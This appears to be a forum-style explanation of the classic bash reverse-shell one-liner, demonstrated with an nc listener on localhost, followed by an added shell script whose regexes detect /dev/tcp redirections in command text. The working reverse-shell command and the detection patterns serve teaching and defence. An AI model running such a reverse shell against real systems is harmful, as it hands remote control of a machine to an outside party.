It’s a(n insecure) remote shell introduced by the target. That’s the opposite of a “normal” remote shell, that is introduced by the source.
Let’s try it with localhost instead of 10.0.0.1:
- Open two tabs in your terminal.
- Open TCP port 8080 and wait for a connection:

      nc localhost -lp 8080

- Open an interactive shell, and redirect the IO streams to a TCP socket:

      bash -i >& /dev/tcp/localhost/8080 0>&1

  where
  - `bash -i`: “If the -i option is present, the shell is interactive.”
  - `>&`: “This special syntax redirects both, stdout and stderr to the specified target.”
  - (argument for `>&`) `/dev/tcp/localhost/8080` is a TCP client connection to `localhost:8080`.
  - `0>&1`: redirect file descriptor 0 (stdin) to fd 1 (stdout), hence the opened TCP socket is used to read input.

  Cf. http://wiki.bash-hackers.org/syntax/redirection
- Rejoice as you have a prompt in tab 1.
- Now imagine not using `localhost`, but some remote IP.
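
A detection-side counterpart to the redirections explained above, added here as an example and not part of the original answer: it classifies command text by whether a shell's streams are wired to a `/dev/tcp` socket. The function names, the regular expressions and the sample lines are assumptions made for this illustration.

```sh
#!/bin/sh
# Added example (not from the original answer). Input is command text as typed:
# shell history, script bodies or `bash -c` strings. Redirections are performed
# by the shell itself, so they do not appear in the argv of the started process.

# A redirection operator (optional fd number) whose target is /dev/tcp|udp/HOST/PORT.
DEVTCP_RE='([0-9]*(>&|&>|<>|>|<))[[:space:]]*/dev/(tcp|udp)/([^/[:space:]]+)/([0-9]+)'
# stdin duplicated from another descriptor, e.g. 0>&1, 0<&1 or <&3.
STDIN_DUP_RE='(^|[[:space:]])(0[<>]|<)&[0-9]+'
# A shell started with an option cluster containing -i (interactive).
INTERACTIVE_RE='(^|[[:space:]/])(bash|sh)[[:space:]]+(-[A-Za-z]+[[:space:]]+)*-[A-Za-z]*i'

# classify_cmdline "<command text>" prints one of:
#   reverse-shell HOST:PORT    interactive shell, socket redirect and stdin dup
#   devtcp-redirect HOST:PORT  socket redirect only (may be benign, e.g. a port probe)
#   clean                      no /dev/tcp redirection found
classify_cmdline() {
    cmd=$1
    target=$(printf '%s\n' "$cmd" | sed -nE "s#.*${DEVTCP_RE}.*#\4:\5#p")
    [ -n "$target" ] || { echo clean; return 0; }
    if printf '%s\n' "$cmd" | grep -Eq "$INTERACTIVE_RE" &&
       printf '%s\n' "$cmd" | grep -Eq "$STDIN_DUP_RE"; then
        echo "reverse-shell $target"
    else
        echo "devtcp-redirect $target"
    fi
}

# Read one command per line on stdin; print "verdict<TAB>line" for every hit.
scan_lines() {
    while IFS= read -r line; do
        verdict=$(classify_cmdline "$line")
        [ "$verdict" = clean ] || printf '%s\t%s\n' "$verdict" "$line"
    done
}

# Constructed sample input; only the first two lines are reported.
scan_lines <<'EOF'
bash -i >& /dev/tcp/localhost/8080 0>&1
echo ping > /dev/tcp/192.0.2.10/7
cat /dev/tcp/localhost/8080
ls -l 2>&1
EOF
```

The third sample line is reported as clean because bash only treats `/dev/tcp/HOST/PORT` specially as a redirection target; as a plain argument it is an ordinary path that does not exist.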